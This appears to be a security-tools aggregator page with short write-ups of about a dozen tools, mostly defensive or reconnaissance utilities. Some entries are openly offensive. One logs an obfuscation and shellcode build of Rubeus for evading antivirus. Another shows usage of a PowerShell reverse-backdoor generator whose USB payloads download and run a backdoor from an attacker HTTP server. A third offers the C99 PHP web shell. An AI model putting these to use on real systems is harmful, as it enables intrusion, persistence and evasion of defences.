File C:\OffensivePipeline\Git\Rubeus\Rubeus.sln:
> Replacing GUID 658C8B7F-3664-4A95-9572-A3E5871DFC06 with 3bd82351-ac9a-4403-b1e7-9660e698d286
> Replacing GUID FAE04EC0-301F-11D3-BF4B-00C04F79EFBC with 619876c2-5a8b-4c48-93c3-f87ca520ac5e
> Replacing GUID 658c8b7f-3664-4a95-9572-a3e5871dfc06 with 11e0084e-937f-46d7-83b5-38a496bf278a
[+] No errors!
File C:\OffensivePipeline\Git\Rubeus\Rubeus\Rubeus.csproj:
> Replacing GUID 658C8B7F-3664-4A95-9572-A3E5871DFC06 with 3bd82351-ac9a-4403-b1e7-9660e698d286
> Replacing GUID FAE04EC0-301F-11D3-BF4B-00C04F79EFBC with 619876c2-5a8b-4c48-93c3-f87ca520ac5e
> Replacing GUID 658c8b7f-3664-4a95-9572-a3e5871dfc06 with 11e0084e-937f-46d7-83b5-38a496bf278a
[+] No errors!
File C:\OffensivePipeline\Git\Rubeus\Rubeus\Properties\AssemblyInfo.cs:
> Replacing GUID 658C8B7F-3664-4A95-9572-A3E5871DFC06 with 3bd82351-ac9a-4403-b1e7-9660e698d286
> Replacing GUID FAE04EC0-301F-11D3-BF4B-00C04F79EFBC with 619876c2-5a8b-4c48-93c3-f87ca520ac5e
> Replacing GUID 658c8b7f-3664-4a95-9572-a3e5871dfc06 with 11e0084e-937f-46d7-83b5-38a496bf278a
[+] No errors!


[+] Load RandomAssemblyInfo module
Replacing strings in C:\OffensivePipeline\Git\Rubeus\Rubeus\Properties\AssemblyInfo.cs
[assembly: AssemblyTitle("Rubeus")] -> [assembly: AssemblyTitle("g4ef3fvphre")]
[assembly: AssemblyDescription("")] -> [assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")] -> [assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("")] -> [assembly: AssemblyCompany("")]
[assembly: AssemblyProduct("Rubeus")] -> [assembly: AssemblyProduct("g4ef3fvphre")]
[assembly: AssemblyCopyright("Copyright © 2018")] -> [assembly: AssemblyCopyright("Copyright © 2018")]
[assembly: AssemblyTrademark("")] -> [assembly: AssemblyTrademark("")]
[assembly: AssemblyCulture("")] -> [assembly: AssemblyCulture("")]


[+] Load BuildCsharp module
[+] Checking requirements...
[*] Downloading nuget.exe from https://dist.nuget.org/win-x86-commandline/latest/nuget.exe
[+] Download OK - nuget.exe
[+] Path found - C:\Program Files (x86)\Microsoft Visual Studio\2022\BuildTools\Common7\Tools\VsDevCmd.bat
Solving dependences with nuget...
Building solution...
[+] No errors!
[+] Output folder: C:\OffensivePipeline\Output\Rubeus_vh00nc50xud


[+] Load ConfuserEx module
[+] Checking requirements...
[+] Downloading ConfuserEx from https://github.com/mkaring/ConfuserEx/releases/download/v1.6.0/ConfuserEx-CLI.zip
[+] Download OK - ConfuserEx
Confusing...
[+] No errors!


[+] Load Donut module
Generating shellcode...

Payload options:
Domain: RMM6XFC3
Runtime:v4.0.30319

Raw Payload: C:\OffensivePipeline\Output\Rubeus_vh00nc50xud\ConfuserEx\Donut\Rubeus.bin
B64 Payload: C:\OffensivePipeline\Output\Rubeus_vh00nc50xud\ConfuserEx\Donut\Rubeus.bin.b64

[+] No errors!


[+] Generating Sha256 hashes
Output file: C:\OffensivePipeline\Output\Rubeus_vh00nc50xud


-----------------------------------------------------------------
SUMMARY

- Rubeus
- RandomGuid: OK
- RandomAssemblyInfo: OK
- BuildCsharp: OK
- ConfuserEx: OK
- Donut: OK

-----------------------------------------------------------------

Plugins

  • RandomGuid: randomise the GUID in .sln, .csproj and AssemblyInfo.cs files
  • RandomAssemblyInfo: randomise the values defined in AssemblyInfo.cs
  • BuildCsharp: build c# project
  • ConfuserEx: obfuscate c# tools
  • Donut: uses Donut to generate shellcodes. The generated shellcode runs without parameters; this may change in future releases.

Add a tool from a remote git

The scripts for downloading the tools are in the Tools folder in yml format. New tools can be added by creating new yml files with the following format:

  • Rubeus.yml file:
tool:
- name: Rubeus
description: Rubeus is a C# toolset for raw Kerberos interaction and abuses
gitLink: https://github.com/GhostPack/Rubeus
solutionPath: Rubeus\Rubeus.sln
language: c#
plugins: RandomGuid, RandomAssemblyInfo, BuildCsharp, ConfuserEx, Donut
authUser:
authToken:

Where:

  • Name: name of the tool
  • Description: tool description
  • GitLink: link from git to clone
  • SolutionPath: solution (sln file) path
  • Language: language used (currently only c# is supported)
  • Plugins: plugins to use on this tool build process
  • AuthUser: user name from github (not used for public repositories)
  • AuthToken: auth token from github (not used for public repositories)

Add a tool from a private git

tool:
- name: SharpHound3-Custom
description: C# Rewrite of the BloodHound Ingestor
gitLink: https://github.com/aaaaaaa/SharpHound3-Custom
solutionPath: SharpHound3-Custom\SharpHound3.sln
language: c#
plugins: RandomGuid, RandomAssemblyInfo, BuildCsharp, ConfuserEx, Donut
authUser: aaaaaaa
authToken: abcdefghijklmnopqrsthtnf

Where:

  • Name: name of the tool
  • Description: tool description
  • GitLink: link from git to clone
  • SolutionPath: solution (sln file) path
  • Language: language used (currently only c# is supported)
  • Plugins: plugins to use in this tool's build process
  • AuthUser: user name from GitHub
  • AuthToken: auth token from GitHub (documented at GitHub: creating a personal access token)

Add a tool from local git folder

tool:
- name: SeatbeltLocal
description: Seatbelt is a C# project that performs a number of security oriented host-survey "safety checks" relevant from both offensive and defensive security perspectives.
gitLink: C:\Users\alpha\Desktop\SeatbeltLocal
solutionPath: SeatbeltLocal\Seatbelt.sln
language: c#
plugins: RandomGuid, RandomAssemblyInfo, BuildCsharp, ConfuserEx, Donut
authUser:
authToken:

Where:

  • Name: name of the tool
  • Description: tool description
  • GitLink: path where the tool is located
  • SolutionPath: solution (sln file) path
  • Language: language used (currently only c# is supported)
  • Plugins: plugins to use in this tool's build process
  • AuthUser: user name from github (not used for local repositories)
  • AuthToken: auth token from github (not used for local repositories)

Requirements for the release version (Visual Studio 2019/2022 is not required)

In the OffensivePipeline.dll.config file it's possible to change the version of the build tools used.

  • Build Tools 2019:
<add key="BuildCSharpTools" value="C:\Program Files (x86)\Microsoft Visual Studio\2019\BuildTools\Common7\Tools\VsDevCmd.bat"/>
  • Build Tools 2022:
<add key="BuildCSharpTools" value="C:\Program Files (x86)\Microsoft Visual Studio\2022\BuildTools\Common7\Tools\VsDevCmd.bat"/>

Requirements for build

Credits

Supported tools



Misp-Extractor - Tool That Connects To A MISP Instance And Retrieves Attributes Of Specific Types (Such As IP Addresses, URLs, And Hashes)


This code connects to a given MISP (Malware Information Sharing Platform) server and parses a given number of events, writing the IP addresses, URLs, and MD5 hashes found in the events to three separate files.


Usage

To use this script, you will need to provide the URL of your MISP instance and a valid API key. You can then call the MISPConnector.run() method to retrieve the attributes and save them to files.

To use the code, run the following command:

python3 misp_connector.py --misp-url <MISP_URL> --misp-key <MISP_API_KEY> --limit <EVENT_LIMIT>

Supported attribute types

The MISPConnector class currently supports the following attribute types:

  • ip-src
  • ip-dst
  • md5
  • url
  • domain

If an attribute of one of these types is found in an event, it will be added to the appropriate set (for example, IP addresses will be added to the network_set) and written to the corresponding file (network.txt, hash.txt, or url.txt).
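A hedged sketch of that flow with PyMISP (the script's exact internals may differ; the URL and key are placeholders):

from pymisp import PyMISP

misp = PyMISP("https://misp.example.com", "YOUR_API_KEY", ssl=True)
network_set, hash_set, url_set = set(), set(), set()

# pull events and bucket supported attribute types into the three sets
for event in misp.search(controller="events", limit=2000, pythonify=True):
    for attr in event.attributes:
        if attr.type in ("ip-src", "ip-dst", "domain"):
            network_set.add(attr.value)
        elif attr.type == "md5":
            hash_set.add(attr.value)
        elif attr.type == "url":
            url_set.add(attr.value)

for name, values in (("network.txt", network_set), ("hash.txt", hash_set), ("url.txt", url_set)):
    with open(name, "w") as f:
        f.write("\n".join(sorted(values)))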

Configuration

The code can be configured by passing arguments to the command-line script. The available arguments are:

  • misp-url: The URL of the MISP server. This argument is required.
  • misp-key: The API key for the MISP server. This argument is required.
  • limit: The maximum number of events to parse. The default is 2000.

Limitations

This script has the following limitations:

  • It only retrieves attributes of specific types (as listed above).
  • It only writes the retrieved attributes to files, without any further processing or analysis.
  • It only retrieves a maximum of 2000 events, as specified by the limit parameter in the misp.search() method.

License

This code is provided under the MIT License. See the LICENSE file for more details.



Web-Hacking-Playground - Web Application With Vulnerabilities Found In Real Cases, Both In Pentests And In Bug Bounty Programs


Web Hacking Playground is a controlled web hacking environment. It consists of vulnerabilities found in real cases, both in pentests and in Bug Bounty programs. The objective is that users can practice with them, and learn to detect and exploit them.

Other topics of interest will also be addressed, such as: bypassing filters by creating custom payloads, executing chained attacks exploiting various vulnerabilities, developing proof-of-concept scripts, among others.


Important

The application source code is visible. However, the lab's approach is a black box one. Therefore, the code should not be reviewed to resolve the challenges.

Additionally, it should be noted that fuzzing (both parameters and directories) and brute force attacks do not provide any advantage in this lab.

Setup

It is recommended to use Kali Linux to perform this lab. In case of using a virtual machine, it is advisable to use the VMware Workstation Player hypervisor.

The environment is based on Docker and Docker Compose, so it is necessary to have both installed.

To install Docker on Kali Linux, run the following commands:

sudo apt update -y
sudo apt install -y docker.io
sudo systemctl enable docker --now
sudo usermod -aG docker $USER

To install Docker on other Debian-based distributions, run the following commands:

curl -fsSL https://get.docker.com -o get-docker.sh
sudo sh get-docker.sh
sudo systemctl enable docker --now
sudo usermod -aG docker $USER

It is recommended to log out and log in again so that the user is recognized as belonging to the docker group.

To install Docker Compose, run the following command:

sudo apt install -y docker-compose

Note: If you are using an M1 Mac, it is recommended to execute the following command before building the images:

export DOCKER_DEFAULT_PLATFORM=linux/amd64

The next step is to clone the repository and build the Docker images:

git clone https://github.com/takito1812/web-hacking-playground.git
cd web-hacking-playground
docker-compose build

Also, it is recommended to install the Foxy Proxy browser extension, which allows you to easily change proxy settings, and Burp Suite, which we will use to intercept HTTP requests.

We will create a new profile in Foxy Proxy to use Burp Suite as a proxy. To do this, we go to the Foxy Proxy options, and add a proxy with the following configuration:

  • Proxy Type: HTTP
  • Proxy IP address: 127.0.0.1
  • Port: 8080

Deployment

Once everything you need is installed, you can deploy the environment with the following command:

git clone https://github.com/takito1812/web-hacking-playground.git
cd web-hacking-playground
docker-compose up -d

This will create two containers of applications developed in Flask on port 80:

  • The vulnerable web application (Socially): Simulates a social network.
  • The exploit server: You should not try to hack it, since it does not have any vulnerabilities. Its objective is to simulate a victim's access to a malicious link.

Important

It is necessary to add the IP of the containers to the /etc/hosts file, so that they can be accessed by name and that the exploit server can communicate with the vulnerable web application. To do this, run the following commands:

sudo sed -i '/whp-/d' /etc/hosts
echo "$(docker inspect -f '{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' whp-socially) whp-socially" | sudo tee -a /etc/hosts
echo "$(docker inspect -f '{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' whp-exploitserver) whp-exploitserver" | sudo tee -a /etc/hosts

Once this is done, the vulnerable application can be accessed from http://whp-socially and the exploit server from http://whp-exploitserver.

When using the exploit server, the above URLs must be used, using the domain name and not the IPs. This ensures correct communication between containers.

When it comes to hacking, to represent the attacker's server, the local Docker IP must be used, since the lab is not intended to make requests to external servers such as Burp Collaborator, Interactsh, etc. A Python http.server can be used to simulate a web server and receive HTTP interactions. To do this, run the following command:

sudo python3 -m http.server 80

Stages

The environment is divided into three stages, each with different vulnerabilities. It is important that they are done in order, as the vulnerabilities in the following stages build on those in the previous stages. The stages are:

  • Stage 1: Access with any user
  • Stage 2: Access as admin
  • Stage 3: Read the /flag file

Important

Below are spoilers for each stage's vulnerabilities. If you don't need help, you can skip this section. On the other hand, if you don't know where to start, or want to check if you're on the right track, you can extend the section that interests you.

Stage 1: Access with any user


At this stage, a specific user's session can be stolen through Cross-Site Scripting (XSS), which allows JavaScript code to be executed. To do this, the victim must be able to access a URL in the user's context; this behavior can be simulated with the exploit server.

The hints to solve this stage are:

  • Are there any striking posts on the home page?
  • You have to chain two vulnerabilities to steal the session. XSS is achieved by exploiting an Open Redirect vulnerability, where the victim is redirected to an external URL.
  • The Open Redirect has some security restrictions. You have to find how to get around them. Analyze which strings are not allowed in the URL.
  • Cookies are not the only place where session information is stored. Reviewing the source code of the JavaScript files included in the application can help clear up doubts.

Stage 2: Access as admin


At this stage, a token can be generated that allows access as admin. This is a typical JSON Web Token (JWT) attack, in which the token payload can be modified to escalate privileges.

The hint to solve this stage is that there is an endpoint that, given a JWT, returns a valid session cookie.

Stage 3: Read the /flag file


At this stage, the /flag file can be read through a Server-Side Template Injection (SSTI) vulnerability. To do this, you must get the application to run Python code on the server; it is possible to execute system commands on the server.

The hints to solve this stage are:

  • Vulnerable functionality is protected by two-factor authentication. Therefore, before exploiting the SSTI, a way to bypass the OTP code request must be found. There are times when the application trusts the requests that are made from the same server and the HTTP headers play an important role in this situation.

  • The SSTI is blind, meaning the output of the code executed on the server is not obtained directly. The Python smtpd module allows you to create an SMTP server that prints the messages it receives to standard output:

    sudo python3 -m smtpd -n -c DebuggingServer 0.0.0.0:25

  • The application uses Flask, so it can be inferred that the template engine is Jinja2 because it is recommended by the official Flask documentation and is widely used. You must get a Jinja2 compatible payload to get the final flag.

  • The email message has a character limitation. Information on how to bypass this limitation can be found on the Internet.

Solutions

Detailed solutions for each stage can be found in the Solutions folder.

Resources

The following resources may be helpful in resolving the stages:

Collaboration

Pull requests are welcome. If you find any bugs, please open an issue.



Invoke-Transfer - PowerShell Clipboard Data Transfer

Invoke-Transfer

Invoke-Transfer is a PowerShell Clipboard Data Transfer.

This tool helps you send files in highly restricted environments such as Citrix, RDP, VNC, or Guacamole, using the clipboard function.

As long as you can send text through the clipboard, you can send files in text format, in small Base64 encoded chunks. Additionally, you can transfer files from a screenshot, using the native OCR function of Microsoft Windows.

Requirements

  • Powershell 5.1
  • Windows 10 or greater

Download

It is recommended to clone the complete repository or download the zip file. You can do this by running the following command:

git clone https://github.com/JoelGMSec/Invoke-Transfer

Usage

.\Invoke-Transfer.ps1 -h

___ _ _____ __
|_ _|_ __ _ __ __ | | __ __ |_ _| __ __ _ _ __ ___ / _| ___ _ __
| || '_ \ \ / / _ \| |/ / _ \____| || '__/ _' | '_ \/ __| |_ / _ \ '__|
| || | | \ V / (_) | < __/____| || | | (_| | | | \__ \ _| __/ |
|___|_| |_|\_/ \___/|_|\_\___| |_||_| \__,_|_| |_|___/_| \___|_|

----------------------- by @JoelGMSec & @3v4Si0N ---------------------


Info: This tool helps you to send files in highly restricted environments
such as Citrix, RDP, VNC, Guacamole... using the clipboard function

Usage: .\Invoke-Transfer.ps1 -split {FILE} -sec {SECONDS}
Send 120KB chunks with a set time delay of seconds
Add -guaca to send files through Apache Guacamole

.\Invoke-Transfer.ps1 -merge {B64FILE} -out {FILE}
Merge Base64 file into original file in desired path

.\Invoke-Transfer.ps1 -read {IMGFILE} -out {FILE}
Read screenshot with Windows OCR and save output to file

Warning: This tool only works on Windows 10 or greater
OCR reading may not be entirely accurate

The detailed guide of use can be found at the following link:

https://darkbyte.net/transfiriendo-ficheros-en-entornos-restringidos-con-invoke-transfer

License

This project is licensed under the GNU 3.0 license - see the LICENSE file for more details.

Credits and Acknowledgments

This tool has been created and designed from scratch by Joel Gámez Molina (@JoelGMSec) and Héctor de Armas Padrón (@3v4si0n).

Contact

This software does not offer any kind of guarantee. Its use is exclusively for educational environments and/or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.

For more information, you can find us on Twitter as @JoelGMSec, @3v4si0n and on my blog darkbyte.net.



Email-Vulnerablity-Checker - Find Email Spoofing Vulnerablity Of Domains


Verify whether a domain is vulnerable to spoofing with Email-Vulnerablity-Checker.

Features

  • This tool automatically tells you whether a domain is email-spoofable or not (see the example dig commands after this list)
  • You can check a single domain or multiple domains (for the multiple-domain check, you need a text file with the domains in it)
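Under the hood, spoofability checks like this boil down to inspecting a domain's SPF and DMARC DNS records; you can reproduce the core idea manually with dig (illustrative commands, not the script's exact logic):

dig txt example.com +short          # look for a v=spf1 record and its -all/~all/?all qualifier
dig txt _dmarc.example.com +short   # look for v=DMARC1 and its p= policy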

Usage:

Clone the package by running:

git clone  https://github.com/BLACK-SCORP10/Email-Vulnerablity-Checker.git

Step 1. Install Requirements

# Update the package list and install dig for Debian-based Linux distribution 
sudo apt update
sudo apt install dnsutils

# Install dig for CentOS
sudo yum install bind-utils

# Install dig for macOS
brew install dig

Step 2. Finish The Installation

To use the Email-Vulnerablity-Checker type the following commands in Terminal:

apt install git -y 
apt install dig -y
git clone https://github.com/BLACK-SCORP10/Email-Vulnerablity-Checker.git
cd Email-Vulnerablity-Checker
chmod 777 spfvuln.sh

Run the email vulnerability checker by just typing:

./spfvuln.sh -h

Support

For Queries: Telegram
Contributions, issues, and feature requests are welcome!
Give a ★ if you like this project!



DNSrecon-gui - DNSrecon Tool With GUI For Kali Linux


DNSRecon is a DNS scanning and enumeration tool written in Python, which allows you to perform different tasks, such as enumeration of standard records for a defined domain (A, NS, SOA, and MX) and top-level domain expansion for a defined domain.

With this graph-oriented user interface, the different records of a specific domain can be observed, classified and ordered in a simple way.

Install

git clone https://github.com/micro-joan/dnsrecon-gui
cd dnsrecon-gui/
chmod +x run.sh
./run.sh

After executing the application launcher, you need to have all the components installed; the launcher will check them one by one and, for any component that is not installed, will show you the command you must enter to install it:


Use

When the tool is ready to use, the installer will give you a URL that you must open in the browser in a private window. Every time you do a search, you will have to open a new private window or clear your browser cache to refresh the graphics.

Tools

Service       Functions                  Status
Text2MindMap  Convert text to mind map   ✅ Free
dnsenum       DNS information gathering  ✅ Free

My website: https://microjoan.com
My blog: https://darkhacking.es/
Buy me a coffee: https://www.buymeacoffee.com/microjoan

DISCLAIMER

This toolkit contains materials that can be potentially damaging or dangerous for social media. Refer to the laws in your province/country before accessing, using, or in any other way utilizing it in a wrong way.

This Tool is made for educational purposes only. Do not attempt to violate the law with anything contained here. If this is your intention, then Get the hell out of here!


Powershell-Backdoor-Generator - Obfuscated Powershell Reverse Backdoor With Flipper Zero And USB Rubber Ducky Payloads


Reverse backdoor written in PowerShell and obfuscated with Python, allowing the backdoor to have a new signature after every run. It can also generate autorun scripts for Flipper Zero and USB Rubber Ducky.

usage: listen.py [-h] [--ip-address IP_ADDRESS] [--port PORT] [--random] [--out OUT] [--verbose] [--delay DELAY] [--flipper FLIPPER] [--ducky]
[--server-port SERVER_PORT] [--payload PAYLOAD] [--list--payloads] [-k KEYBOARD] [-L] [-H]

Powershell Backdoor Generator

options:
-h, --help show this help message and exit
--ip-address IP_ADDRESS, -i IP_ADDRESS
IP Address to bind the backdoor too (default: 192.168.X.XX)
--port PORT, -p PORT Port for the backdoor to connect over (default: 4444)
--random, -r Randomizes the outputed backdoor's file name
--out OUT, -o OUT Specify the backdoor filename (relative file names)
--verbose, -v Show verbose output
--delay DELAY Delay in milliseconds before Flipper Zero/Ducky-Script payload execution (default:100)
--flipper FLIPPER Payload file for flipper zero (includes EOL conversion) (relative file name)
--ducky Creates an inject.bin for the http server
--server-port SERVER_PORT
Port to run the HTTP server on (--server) (default: 8080)
--payload PAYLOAD USB Rubber Ducky/Flipper Zero backdoor payload to execute
--list--payloads List all available payloads
-k KEYBOARD, --keyboard KEYBOARD
Keyboard layout for Bad Usb/Flipper Zero (default: us)
-A, --actually-listen
Just listen for any backdoor connections
-H, --listen-and-host
Just listen for any backdoor connections and host the backdoor directory

Features

  • Hak5 Rubber Ducky payload
  • Flipper Zero payload
  • Download Files from remote system
  • Fetch the target computer's public IP address
  • List local users
  • Find interesting files
  • Get OS Information
  • Get BIOS Information
  • Get Anti-Virus Status
  • Get Active TCP Clients
  • Checks for common pentesting software installed

Standard backdoor

C:\Users\DrewQ\Desktop\powershell-backdoor-main> python .\listen.py --verbose
[*] Encoding backdoor script
[*] Saved backdoor backdoor.ps1 sha1:32b9ca5c3cd088323da7aed161a788709d171b71
[*] Starting Backdoor Listener 192.168.0.223:4444 use CTRL+BREAK to stop

A file called backdoor.ps1 will be created in the current working directory.

Bad USB/ USB Rubber Ducky attacks

When using any of these attacks, you will be opening up an HTTP server hosting the backdoor. Once the backdoor is retrieved, the HTTP server will be shut down.

Payloads

  • Execute -- Execute the backdoor
  • BindAndExecute -- Place the backdoor in temp, bind the backdoor to startup and then execute it.

Flipper Zero Backdoor

C:\Users\DrewQ\Desktop\powershell-backdoor-main> python .\listen.py --flipper powershell_backdoor.txt --payload execute
[*] Started HTTP server hosting file: http://192.168.0.223:8989/backdoor.ps1
[*] Starting Backdoor Listener 192.168.0.223:4444 use CTRL+BREAK to stop

Place the text file you specified (e.g., powershell_backdoor.txt) onto your Flipper Zero. When the payload is executed, it will download and execute backdoor.ps1.

Usb Rubber Ducky Backdoor

 C:\Users\DrewQ\Desktop\powershell-backdoor-main> python .\listen.py --ducky --payload BindAndExecute
[*] Started HTTP server hosting file: http://192.168.0.223:8989/backdoor.ps1
[*] Starting Backdoor Listener 192.168.0.223:4444 use CTRL+BREAK to stop

A file named inject.bin will be placed in your current working directory. Java is required for this feature. When the payload is executed it will download and execute backdoor.ps1

Backdoor Execution

Tested on Windows 11, Windows 10 and Kali Linux

powershell.exe -File backdoor.ps1 -ExecutionPolicy Unrestricted
┌──(drew㉿kali)-[/home/drew/Documents]
└─PS> ./backdoor.ps1

To Do

  • Add Standard Backdoor
  • Find Writeable Directories
  • Get Windows Update Status

Output of 5 obfuscations/Runs

sha1:c7a5fa3e56640ce48dcc3e8d972e444d9cdd2306
sha1:b32dab7b26cdf6b9548baea6f3cfe5b8f326ceda
sha1:e49ab36a7ad6b9fc195b4130164a508432f347db
sha1:ba40fa061a93cf2ac5b6f2480f6aab4979bd211b
sha1:f2e43320403fb11573178915b7e1f258e7c1b3f0


Leaktopus - Keep Your Source Code Under Control

Keep your source code under control.

Key Features

  • Plug&Play - one line installation with Docker.

  • Scan various sources containing a set of keywords, e.g. ORGANIZATION-NAME.com.

    Currently supports:

    • GitHub
      • Repositories
      • Gists (coming soon)
    • Paste sites (e.g., PasteBin) (coming soon)
  • Filter results with a built-in heuristic engine.

  • Enhance results with IOLs (Indicators Of Leak):

    • Secrets in the found sources (including Git repos commits history):
    • URIs (Including indication of your organization's domains)
    • Emails (Including indication of your organization's email addresses)
    • Contributors
    • Sensitive keywords (e.g., canary token, internal domains)
  • Allows ignoring public sources (e.g., "junk" repositories created by web crawlers).

  • OOTB ignore list of common "junk" sources.

  • Acknowledge a leak, and only get notified if the source has been modified since the previous scan.

  • Built-in ELK to search for data in leaks (including full index of Git repositories with IOLs).

  • Notify on new leaks

    • MS Teams Webhook.
    • Slack Bot.
    • Cortex XSOAR® (by Palo Alto Networks) Integration (WIP).

Technology Stack

  • Fully Dockerized.
  • API-first Python Flask backend.
  • Decoupled Vue.js (3.x) frontend.
  • SQLite DB.
  • Async tasks with Celery + Redis queues.

Prerequisites

  • Docker-Compose

Installation

  • Clone the repository
  • Create a local .env file
    cd Leaktopus
    cp .env.example .env
  • Edit .env according to your local setup (see the internal comments).
  • Run Leaktopus
    docker-compose up -d
  • Initiate the installation sequence by accessing the installation API. Just open http://{LEAKTOPUS_HOST}:8000/api/install in your browser.
  • Check that the API is up and running at http://{LEAKTOPUS_HOST}:8000/up
  • The UI should be available at http://{LEAKTOPUS_HOST}:8080

Using Github App

In addition to the basic personal access token option, Leaktopus supports Github App authentication. Using Github App is recommended due to the increased rate limits.

  1. To use Github App authentication, you need to create a Github App and install it on your organization/account. See Github's documentation for more details.

  2. After creating the app, you need to set the following environment variables:

    • GITHUB_USE_APP=True
    • GITHUB_APP_ID
    • GITHUB_INSTALLATION_ID - The installation id can be found in your app installation.
    • GITHUB_APP_PRIVATE_KEY_PATH (defaults to /app/private-key.pem)
  3. Mount the private key file to the container (see docker-compose.yml for an example). ./leaktopus_backend/private-key.pem:/app/private-key.pem

* Note that GITHUB_ACCESS_TOKEN will be ignored if GITHUB_USE_APP is set to True.

Updating Leaktopus

If you wish to update your Leaktopus version (pulling a newer version), just follow the next steps.

  • Pull the latest version.
    git pull
  • Rebuild Docker images (data won't be deleted).
    # Force image recreation
    docker-compose up --force-recreate --build
  • Run the DB update by calling its API (should be required after some updates). http://{LEAKTOPUS_HOST}/api/updatedb

Results Filtering Heuristic Engine

The built-in heuristic engine filters the search results to reduce false positives based on:

  • Content:
    • More than X emails containing non-organizational domains.
    • More than X URIs containing non-organizational domains.
  • Metadata:
    • More than X stars.
    • More than X forks.
  • Sources ignore list.

API Documentation

OpenAPI documentation is available at http://{LEAKTOPUS_HOST}:8000/apidocs.

Leaktopus Services

Service           Port  Mandatory/Optional
Backend (API)     8000  Mandatory
Backend (Worker)  N/A   Mandatory
Redis             6379  Mandatory
Frontend          8080  Optional
Elasticsearch     9200  Optional
Logstash          5000  Optional
Kibana            5601  Optional

The above can be customized by using a custom docker-compose.yml file.

Security Notes

As for now, Leaktopus does not provide any authentication mechanism. Make sure that you are not exposing it to the world, and doing your best to restrict access to your Leaktopus instance(s).

Contributing

Contributions are very welcome.

Please follow our contribution guidelines and documentation.



C99Shell-PHP7 - PHP 7 And Safe-Build Update Of The Popular C99 Variant Of PHP Shell


C99Shell-PHP7

PHP 7 and safe-build Update of the popular C99 variant of PHP Shell.

c99shell.php v.2.0 (PHP 7) (25.02.2019) Updated by: PinoyWH1Z for PHP 7

About C99Shell

An excellent example of a web shell is the c99 variant, a PHP shell (most call it malware) often uploaded to a vulnerable web application to give the attacker an interface. The c99 shell lets the attacker take control of the processes of the Internet server, allowing him or her to run commands on the server as the account under which the threat is operating. It lets the hacker upload and browse the file system, edit and view files, as well as delete and move them and change permissions. Finding a c99 shell is an excellent way to identify a compromise on a system. The c99 shell is about 1500 lines long if packed and 4900+ if properly displayed, and some of its traits include showing security measures the web server may use, a file viewer that shows permissions, and a place where the attacker can run custom PHP code (PHP malware c99 shell).

There are different variants of the c99 shell in use today. This GitHub release is an example of a relatively recent one. It has many signatures that can be utilized to write protective countermeasures.


About this release:

I've been using PHP shells as part of my ethical hacking activities, and I have noticed that most of the PHP shells downloadable online are laced with malicious code without you knowing; others also insert trackers so they can see where you placed your PHP shell.

I came up with an idea: "what if I get the stable version of c99shell, reverse the encrypted code, remove the malicious parts and release it to the public for good?" And yeah, I decided to do it, but I noticed that most servers have now upgraded their Apache service to PHP 7 while, sadly, the code I had was for PHP 5.3 and below.

The good thing is that only a few lines of syntax needed to be altered, so I did it.

Here you go, mates: a clean, safe-build version of the most stable c99shell I know of.

If you see more bugs, please create an issue, or just fork it, update it and open a pull request so I can check and update the code for stabilization.

PS:

This is a PHP shell widely used by hackers, so don't freak out if your anti-virus/anti-malware detects this PHP file as malicious or treats it as a backdoor. Since you can see the code in my re-released project, you can read through all of it and inspect or even debug it as much as you like.

Disclaimer:

I will NOT be held responsible for any unethical use of this hacking tool.

Official Release:

c99shell_v2.0.zip (Zip Password: PinoyWH1Z)



Darkdump2 - Search The Deep Web Straight From Your Terminal



About Darkdump (Recent Notice - 12/27/22)

Darkdump is a simple script written in Python 3.11 that lets users enter a search term (query) on the command line; darkdump will then pull all the deep web sites relating to that query. Darkdump 2.0 is here, enjoy!

Installation

  1. git clone https://github.com/josh0xA/darkdump
  2. cd darkdump
  3. python3 -m pip install -r requirements.txt
  4. python3 darkdump.py --help

Usage

Example 1: python3 darkdump.py --query programming
Example 2: python3 darkdump.py --query="chat rooms"
Example 3: python3 darkdump.py --query hackers --amount 12

  • Note: The 'amount' argument limits the number of results returned

Usage With Increased Anonymity

Darkdump Proxy: python3 darkdump.py --query bitcoin -p

Menu


____ _ _
| \ ___ ___| |_ _| |_ _ _____ ___
| | | .'| _| '_| . | | | | . |
|____/|__,|_| |_,_|___|___|_|_|_| _|
|_|

Developed By: Josh Schiavone
https://github.com/josh0xA
joshschiavone.com
Version 2.0

usage: darkdump.py [-h] [-v] [-q QUERY] [-a AMOUNT] [-p]

options:
-h, --help show this help message and exit
-v, --version returns darkdump's version
-q QUERY, --query QUERY
the keyword or string you want to search on the deepweb
-a AMOUNT, --amount AMOUNT
the amount of results you want to retrieve (default: 10)
-p, --proxy use darkdump proxy to increase anonymity

Visual

Ethical Notice

The developer of this program, Josh Schiavone, is not responsible for misuse of this data gathering tool. Do not use darkdump to navigate websites that take part in any activity identified as illegal under the laws and regulations of your government. May God bless you all.

License

MIT License
Copyright (c) Josh Schiavone



Heap_Detective - The Simple Way To Detect Heap Memory Pitfalls In C++ And C


This tool uses the taint analysis technique for static analysis and aims to identify heap memory usage vulnerabilities in the C and C++ languages. In its first phase the tool takes a common static analysis approach, using tokenization to collect information.

The second phase departs from the classic lessons of the legendary dragon book: the tool does not use an AST or resources like LLVM, with their parsers and standard advice. The approach presented here aims to explore other ways of detecting vulnerabilities, using custom vector structures and a typical recursive traversal that ranks each taint point. The sum of these techniques is Heap_detective.

The tool follows the KISS principle ("Keep it simple, stupid!"). There's more than one way to build a SAST tool, I know that. Yes, I thought about using a graph database or an AST, but that would have broken the KISS principle in the context of this project.
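
To make the approach concrete, here is a heavily simplified Python sketch of the same family of technique (tokenize each line, record malloc/free sinks per variable, flag a second free); this is only an illustration of the idea, not the tool's C implementation:

import re

# Naive tokenizer-style pass: collect malloc/free "sinks" per variable and
# flag a double free. Illustrative only; Heap_detective's real analysis also
# tracks loops, reassignments and use-after-free.
ALLOC = re.compile(r"(\w+)\s*=\s*malloc\(")
FREE = re.compile(r"free\((\w+)\)")

def analyse(source: str) -> None:
    freed = set()
    for lineno, line in enumerate(source.splitlines(), 1):
        if m := ALLOC.search(line):
            freed.discard(m.group(1))   # a fresh allocation resets the state
        if m := FREE.search(line):
            var = m.group(1)
            if var in freed:
                print(f"line {lineno}: double free of '{var}'")
            freed.add(var)              # taint point: freed pointer

analyse("""
char *p;
p = malloc(100);
free(p);
free(p);
""")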

